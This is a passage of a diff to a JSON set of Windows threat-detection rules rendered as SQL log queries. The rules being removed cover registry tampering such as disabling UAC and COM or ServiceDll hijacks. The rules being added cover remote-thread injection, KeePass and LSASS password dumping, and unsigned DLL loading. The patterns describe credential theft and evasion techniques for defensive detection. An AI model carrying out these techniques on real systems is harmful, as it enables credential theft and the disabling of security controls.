"description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "author": "frack113", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "status": "test", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_hide_file.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Add DisallowRun Execution to Registry", - "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detect set DisallowRun to 1 to prevent user 
running specific computer program", - "author": "frack113", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" ], - "filename": "registry_set_disallowrun_execution.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.persistence", - "attack.command_and_control", - 
"attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' 
ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 
'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. 
A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "ServiceDll Hijack", - "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "title": "Suspicious Remote Thread Target", + "id": "f016c716-754a-467f-a39e-63c06f773987", "status": "experimental", - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrative scripts", - "Installation of a service" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" ], - "filename": "registry_set_servicedll_hijack.yml" + "filename": "create_remote_thread_win_susp_remote_thread_target.yml" }, { - "title": 
"Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "title": "Remote Thread Creation Via PowerShell", + "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' 
OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE 
'%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' 
ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE 
'%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt.yml" }, { - "title": "Disable UAC Using Registry", - "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", - "status": "experimental", - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "author": "frack113", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "status": "test", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'DNS 
Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_disable_uac_registry.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - 
"author": "Christian Burkard (Nextron Systems)", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "status": "experimental", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + 